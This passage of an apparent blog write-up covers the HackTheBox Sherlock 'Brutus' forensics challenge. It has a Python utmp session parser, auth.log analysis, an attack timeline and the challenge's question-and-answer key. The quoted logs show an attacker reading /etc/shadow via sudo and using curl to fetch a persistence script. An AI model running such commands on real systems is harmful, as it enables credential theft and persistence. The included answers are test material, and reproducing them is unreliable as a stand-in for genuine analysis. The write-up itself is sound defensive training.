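def parse_utmpdump(text):
    """Turn utmpdump text into dicts; the header line and anything else unmatched is skipped."""
    records = []
    for raw in text.splitlines():
        m = RECORD_RE.match(raw)
        if not m:
            continue
        rtype, pid, ident, user, line, host, ip, ts = (f.strip() for f in m.groups())
        records.append({
            "type": int(rtype), "pid": int(pid), "id": ident, "user": user,
            "line": line, "host": host, "ip": ip,
            # utmpdump writes microseconds after a comma; fromisoformat expects a dot
            "time": datetime.fromisoformat(ts.replace(",", ".")),
        })
    return records


def _finish(start, end, reason):
    seconds = None if end is None else round((end - start["time"]).total_seconds())
    return {"user": start["user"], "line": start["line"], "host": start["host"],
            "start": start["time"], "end": end, "seconds": seconds, "ended_by": reason}


def reconstruct_sessions(records):
    """Pair each USER_PROCESS login with the next DEAD_PROCESS on the same tty.

    Returns (closed_sessions, still_open). A shutdown or reboot record ends every
    open session. A DEAD_PROCESS with no open session on that tty is ignored rather
    than paired with the wrong login.
    """
    open_by_line = {}
    closed = []
    for r in records:
        if r["type"] == USER_PROCESS:
            if r["line"] in open_by_line:
                # new login on a tty we still believe is open: the previous logout was never recorded
                closed.append(_finish(open_by_line.pop(r["line"]), None, "missing logout record"))
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS:
            start = open_by_line.pop(r["line"], None)
            if start is not None:
                closed.append(_finish(start, r["time"], "logout"))
        elif r["type"] == BOOT_TIME or (r["type"] == RUN_LVL and r["user"] == "shutdown"):
            for start in list(open_by_line.values()):
                closed.append(_finish(start, r["time"], r["user"]))
            open_by_line.clear()
    return closed, list(open_by_line.values())


if __name__ == "__main__":
    closed, still_open = reconstruct_sessions(parse_utmpdump(SAMPLE_UTMPDUMP))
    for s in closed:
        print(f"{s['user']:12} {s['line']:6} {s['host']:15} {s['start']:%Y-%m-%d %H:%M:%S} "
              f"{str(s['seconds']):5}s ({s['ended_by']})")
    for s in still_open:
        print(f"{s['user']:12} {s['line']:6} {s['host']:15} {s['time']:%Y-%m-%d %H:%M:%S} still open")
```

&lt;p&gt;The root session on pts/1 from 65.2.161.68 comes out at 279 seconds, matching Task 7, while the root login on pts/0 at 06:19:55 and the cyberjunkie login at 06:37:35 are reported as still open because no DEAD_PROCESS record follows them in the file. Note that the DEAD_PROCESS PID is the sshd child that owned the session, not the PID on the login record, which is why the pairing keys on the terminal line rather than the PID.&lt;/p&gt;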

&lt;h2&gt;
  
  
  Cyberjunkie Session Analysis
&lt;/h2&gt;

&lt;p&gt;The auth.log file shows another successful authentication by the newly created user, &lt;em&gt;cyberjunkie&lt;/em&gt;, at 06:37:34, with wtmp confirming the session began one second later.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2  
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)  
Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.  
Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After logging in, the user performs a few actions recorded in auth.log. At 06:37:57, they use sudo to print the contents of the &lt;code&gt;/etc/shadow&lt;/code&gt; file, which contains password hashes for system users.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow  
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)  
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Approximately a minute later, they download the script &lt;code&gt;linper.sh&lt;/code&gt; from GitHub using the command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh  
Mar  6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)  
Mar  6 06:39:39 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Attack Timeline
&lt;/h2&gt;

&lt;p&gt;Here’s the timeline summarized and organized:&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;&lt;th&gt;Time (UTC)&lt;/th&gt;&lt;th&gt;Event Description&lt;/th&gt;&lt;th&gt;Source&lt;/th&gt;&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;06:18:01&lt;/td&gt;&lt;td&gt;First log entry recorded&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:31:33&lt;/td&gt;&lt;td&gt;SSH brute force attack begins&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:31:40&lt;/td&gt;&lt;td&gt;Successful SSH login as root&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:31:42&lt;/td&gt;&lt;td&gt;SSH brute force attack ends&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:32:44&lt;/td&gt;&lt;td&gt;Root user logs in via SSH&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:32:45&lt;/td&gt;&lt;td&gt;Root terminal session initiated&lt;/td&gt;&lt;td&gt;&lt;code&gt;wtmp&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:34:18&lt;/td&gt;&lt;td&gt;“cyberjunkie” user and group created&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:35:15&lt;/td&gt;&lt;td&gt;“cyberjunkie” added to the sudo group&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:37:24&lt;/td&gt;&lt;td&gt;Root session disconnects&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:37:34&lt;/td&gt;&lt;td&gt;“cyberjunkie” logs in via SSH&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:37:35&lt;/td&gt;&lt;td&gt;“cyberjunkie” terminal session initiated&lt;/td&gt;&lt;td&gt;&lt;code&gt;wtmp&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:37:57&lt;/td&gt;&lt;td&gt;“cyberjunkie” accesses &lt;code&gt;/etc/shadow&lt;/code&gt; file&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:39:38&lt;/td&gt;&lt;td&gt;“cyberjunkie” downloads &lt;code&gt;linper.sh&lt;/code&gt;&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;06:41:01&lt;/td&gt;&lt;td&gt;Final log entry recorded&lt;/td&gt;&lt;td&gt;&lt;code&gt;auth.log&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;h2&gt;
  
  
  HackTheBox Sherlock Brutus Questions and answers
&lt;/h2&gt;

&lt;p&gt;Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?&lt;/p&gt;

&lt;p&gt;65.2.161.68&lt;/p&gt;

&lt;p&gt;The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?&lt;/p&gt;

&lt;p&gt;root&lt;/p&gt;

&lt;p&gt;Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?&lt;/p&gt;

&lt;p&gt;2024-03-06 06:32:45&lt;/p&gt;

&lt;p&gt;SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?&lt;/p&gt;

&lt;p&gt;37&lt;/p&gt;

&lt;p&gt;The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?&lt;/p&gt;

&lt;p&gt;cyberjunkie&lt;/p&gt;

&lt;p&gt;What is the MITRE ATT&amp;amp;CK sub-technique ID used for persistence?&lt;/p&gt;

&lt;p&gt;T1136.001&lt;/p&gt;

&lt;p&gt;How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)&lt;/p&gt;

&lt;p&gt;279&lt;/p&gt;

&lt;p&gt;The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?&lt;/p&gt;

&lt;p&gt;/usr/bin/curl &lt;a href="https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  You can also watch:
&lt;/h2&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/hqqKTs5a_xw"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

</description>
      <category>security</category>
      <category>tutorial</category>
      <category>cybersecurity</category>
      <category>linux</category>
    </item>
  </channel>
</rss>
